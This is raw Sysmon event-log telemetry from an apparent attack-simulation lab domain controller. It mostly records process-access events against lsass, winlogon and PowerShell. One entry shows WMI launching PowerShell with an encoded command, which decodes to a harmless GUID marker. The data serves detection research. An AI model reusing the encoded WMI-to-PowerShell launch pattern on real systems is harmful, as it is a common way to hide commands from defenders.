16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6DD2-603E-CFAA-00000000AD01}133729912C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CFAA-00000000AD01}13372C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002242185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39C77739782F434E6F775C937223E1F4,SHA256=3F88392DDFEE6643C1F4B36588554D5D7DD4EF334886B58E6BAF3D54A6BD3A06,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002242181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ra2dcuty.0q4.ps12021-03-02 16:54:42.592 10341000x80000000000000002242180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.592{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.575{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.591{05ADC7E1-6DD2-603E-CEAA-00000000AD01}3944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Enco VwByAGkAdABlAC0ASABvAHMAdAAgADYAOABmAGQAMAA5ADQAMQAtADkAOQBiAGYALQA0ADEAZgAzAC0AYgA2ADgAOAAtADEAYQBhAGIANgBkADQAMwBiAGYAOAAzAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002242173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.575{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.567{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.567{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CCAA-00000000AD01}14264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.566{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\S